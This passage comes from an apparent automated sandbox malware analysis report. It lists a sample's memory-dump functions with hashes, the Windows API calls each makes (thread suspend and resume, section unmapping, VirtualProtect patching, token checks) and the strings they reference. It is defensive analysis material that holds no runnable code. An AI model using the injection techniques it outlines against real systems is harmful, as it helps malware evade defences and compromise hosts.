    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
